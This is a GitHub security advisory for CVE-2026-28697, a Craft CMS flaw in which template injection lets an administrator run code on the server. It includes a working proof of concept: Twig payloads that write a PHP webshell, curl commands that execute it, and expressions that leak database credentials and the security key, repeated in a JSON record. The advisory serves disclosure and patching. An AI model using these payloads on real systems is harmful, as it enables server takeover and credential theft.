GHSA-V47Q-JXVR-P68X

Vulnerability from github – Published: 2026-03-03 21:00 – Updated: 2026-03-04 18:39
VLAI?
Summary
Craft CMS Vulnerable to Authenticated RCE via "craft.app.fs.write()" in Twig Templates
Details

Summary

An authenticated administrator can achieve Remote Code Execution (RCE) by injecting a Server-Side Template Injection (SSTI) payload into Twig template fields (e.g., Email Templates). By calling the craft.app.fs.write() method, an attacker can write a malicious PHP script to a web-accessible directory and subsequently access it via the browser to execute arbitrary system commands.

Proof of Concept

Attack Prerequisites

  • Authenticated administrator account with allowAdminChanges enabled, or access to the System Messages utility

Steps to Reproduce

  1. Navigate to Utilities → System Messages (/admin/utilities/system-messages)
  2. Edit any email template (e.g., "Test Email") and inject the following in the body (or the Subject):
    • To exploit it by writing to a file system:
      • Note: Replace the filesystem handle (e.g., hardDisk) with a valid handle configured in the target installation. twig {{ craft.app.fs.getFilesystemByHandle('hardDisk').write('shell.php', '<?php isset($_GET["c"]) ? system($_GET["c"]) : null; ?>') }}
    • To exploit it by writing to a volume:
      • Note: Replace the volume handle (e.g., images) with a valid handle configured in the target installation. twig {{ craft.app.volumes.getVolumeByHandle('images').fs.write('shell.php', '<?php isset($_GET["c"]) ? system($_GET["c"]) : null; ?>') }} payload-injection
  3. Save & go to Settings → Email (/admin/settings/email)
  4. Click "Test" at the bottom of the page to trigger template rendering
  5. The webshell is now written to the filesystem/volume. Access it via curl or directly from the browser: Note: The path might be different on your end depending on the filesystem or volume configuration. bash # For Filesystem curl "http://target.com/uploads/shell.php?c=id" # For Volume curl "http://target.com/uploads/images/shell.php?c=id" # Example Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) rce-poc

Additional Impact

The same craft.app exposure without any security measures enables additional attack vectors:

Database Credential Disclosure

Database credentials are stored in .env outside the webroot and are not accessible to admins through the UI. This bypasses that protection.

{{ craft.app.db.username }}
{{ craft.app.db.password }}
{{ craft.app.db.dsn }}

Security Key Disclosure

Craft explicitly redacts the security key from phpinfo and error logs, indicating it should be protected. However, craft.app.config.general.securityKey bypasses this protection.

{{ craft.app.config.general.securityKey }}

Recommended Fix

  • Add Twig sandbox rules to block write, writeFileFromStream, deleteFile, and similar destructive methods
  • Consider allowlist approach for craft.app properties accessible in templates rather than exposing the entire application

Resources

https://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197 https://github.com/craftcms/cms/pull/18219 https://github.com/craftcms/cms/pull/18216

Severity ?
9.4 (Critical)
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-RC1"
            },
            {
              "fixed": "5.9.0-beta.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-RC1"
            },
            {
              "fixed": "4.17.0-beta.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28697"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T21:00:16Z",
    "nvd_published_at": "2026-03-04T17:16:21Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nAn authenticated administrator can achieve Remote Code Execution (RCE) by injecting a Server-Side Template Injection (SSTI) payload into Twig template fields (e.g., Email Templates). By calling the `craft.app.fs.write()` method, an attacker can write a malicious PHP script to a web-accessible directory and subsequently access it via the browser to execute arbitrary system commands.\n\n---\n## Proof of Concept\n\n### Attack Prerequisites\n\n- Authenticated administrator account with `allowAdminChanges` enabled, or access to the System Messages utility\n\n### Steps to Reproduce\n\n1. Navigate to **Utilities \u2192 System Messages** (`/admin/utilities/system-messages`)\n2. Edit any email template (e.g., \"Test Email\") and inject the following in the body (or the Subject):\n\t- To exploit it by writing to a file system:\n\t\t- **Note:** Replace the filesystem handle (e.g., `hardDisk`) with a valid handle configured in the target installation.\n\t\t```twig\n\t\t{{ craft.app.fs.getFilesystemByHandle(\u0027hardDisk\u0027).write(\u0027shell.php\u0027, \u0027\u003c?php isset($_GET[\"c\"]) ? system($_GET[\"c\"]) : null; ?\u003e\u0027) }}\n\t\t```\n\t- To exploit it by writing to a volume:\n\t\t- **Note:** Replace the volume handle (e.g., `images`) with a valid handle configured in the target installation.\n\t\t```twig\n\t\t{{ craft.app.volumes.getVolumeByHandle(\u0027images\u0027).fs.write(\u0027shell.php\u0027, \u0027\u003c?php isset($_GET[\"c\"]) ? system($_GET[\"c\"]) : null; ?\u003e\u0027) }}\n\t\t```\n\t\u003cimg width=\"982\" height=\"901\" alt=\"payload-injection\" src=\"https://github.com/user-attachments/assets/86fbb99c-a551-4395-93a1-30e62e77c57e\" /\u003e\n3. Save \u0026 go to **Settings \u2192 Email** (`/admin/settings/email`)\n4. Click **\"Test\"** at the bottom of the page to trigger template rendering\n5. The webshell is now written to the filesystem/volume. Access it via curl or directly from the browser:\n\t**Note:** The path might be different on your end depending on the filesystem or volume configuration.\n\t```bash\n\t# For Filesystem\n\tcurl \"http://target.com/uploads/shell.php?c=id\"\n\t# For Volume\n\tcurl \"http://target.com/uploads/images/shell.php?c=id\"\n\t# Example Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)\n\t```\n\t\u003cimg width=\"791\" height=\"440\" alt=\"rce-poc\" src=\"https://github.com/user-attachments/assets/6a895609-bea0-459a-9659-0d1437f838f4\" /\u003e\n\n---\n## Additional Impact\n\nThe same `craft.app` exposure without any security measures enables additional attack vectors:\n\n### Database Credential Disclosure\n\nDatabase credentials are stored in `.env` outside the webroot and are not accessible to admins through the UI. This bypasses that protection.\n\n```twig\n{{ craft.app.db.username }}\n{{ craft.app.db.password }}\n{{ craft.app.db.dsn }}\n```\n\n### Security Key Disclosure\n\nCraft explicitly redacts the security key from phpinfo and error logs, indicating it should be protected. However, `craft.app.config.general.securityKey` bypasses this protection.\n```twig\n{{ craft.app.config.general.securityKey }}\n```\n## Recommended Fix\n- **Add Twig sandbox rules** to block `write`, `writeFileFromStream`, `deleteFile`, and similar destructive methods\n- **Consider allowlist approach** for `craft.app` properties accessible in templates rather than exposing the entire application\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197\nhttps://github.com/craftcms/cms/pull/18219\nhttps://github.com/craftcms/cms/pull/18216",
  "id": "GHSA-v47q-jxvr-p68x",
  "modified": "2026-03-04T18:39:01Z",
  "published": "2026-03-03T21:00:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-v47q-jxvr-p68x"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28697"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/pull/18216"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/pull/18219"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS Vulnerable to Authenticated RCE via \"craft.app.fs.write()\" in Twig Templates"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.